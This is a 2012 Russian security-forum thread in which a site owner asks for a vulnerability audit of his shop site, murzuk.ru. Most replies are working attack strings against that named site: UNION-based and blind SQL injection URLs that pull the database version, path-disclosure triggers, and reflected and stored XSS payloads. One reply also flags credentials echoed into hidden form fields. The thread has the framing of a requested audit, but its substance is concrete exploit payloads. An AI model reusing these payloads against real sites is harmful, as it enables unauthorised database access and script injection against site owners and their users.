RDot

RDot (https://rdot.org/forum/index.php)
-   Аудит Web-приложений/Web Application Security Audit (https://rdot.org/forum/forumdisplay.php?f=27)
-   -   Аудит (https://rdot.org/forum/showthread.php?t=2466)

Ranow 22.10.2012 17:54

Аудит
 
Помогите провести аудит сайта на уязвимости и исправить их. Сайт - http://murzuk.ru
P.S. Вопрос вознаграждения давайте обсудим в личке! Заранее огромное спасибо!

kingbeef 22.10.2012 18:07

http://murzuk.ru/show_good.php?idtov=-35007'+union+select+1,2,3,version(),5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20--+f

5.0.92-log

http://murzuk.ru/osnov_cart.php?c=9&new=777384'

Раскрытие путей.


UPD.
Xss

http://murzuk.ru/osnov_cart.php?c=2
Уязвимое поле "Адрес доставки"

<svg/onload=alert(/xss/)>

Jokester 22.10.2012 18:34

https://rdot.org/forum/showthread.php?t=26

Не будет баннера акк пойдёт в бан

Ranow 22.10.2012 18:50

готово

Jokester 22.10.2012 18:54

спасибо

BlackFan 22.10.2012 19:57

xss
http://murzuk.ru/show_cat2.php?grid=2141&catid=2171%3E%3Ch1%3Exss
http://murzuk.ru/show_fine.php?dd=23&grid=51%3E%3Ch1%3Exss
http://murzuk.ru/osnov_cart.php?c=9
post
a555039:><h1>xss


fpd
http://murzuk.ru/show_cart2.php?&new=-1
http://murzuk.ru/show_silk.php


sqli
http://murzuk.ru/show_cart2.php?&new=555040'+and+0+union+select+1,2 ,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20--+-

M_script 22.10.2012 20:13

http://murzuk.ru/osnov_cart.php?c=2
Код:

<input type=hidden name=username value=\"".$username."\">
<input type=hidden name=passwd value=\"".$passwd."\">
<input type=hidden name=passwd2 value=\"".$passwd2."\">

что это?

Ranow 22.10.2012 22:03

Ищу специалиста по устранению ошибок...пишите в личку, обсудим оплату.

Pashkela 22.10.2012 22:46

blind sqli
  • http://murzuk.ru/show_foto.php?idft=30+and(mid(version(),1,1)=5)
  • http://murzuk.ru/show_foto.php?idft=30+and(mid(version(),3,1)=0)
  • http://murzuk.ru/osnov.php?c=46&idgrdesk=1'+and(mid(version(),1,1)= 5)and'1

Ranow 23.10.2012 14:17

Спасибо, тему можно закрывать!


Часовой пояс GMT +3, время: 04:52.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot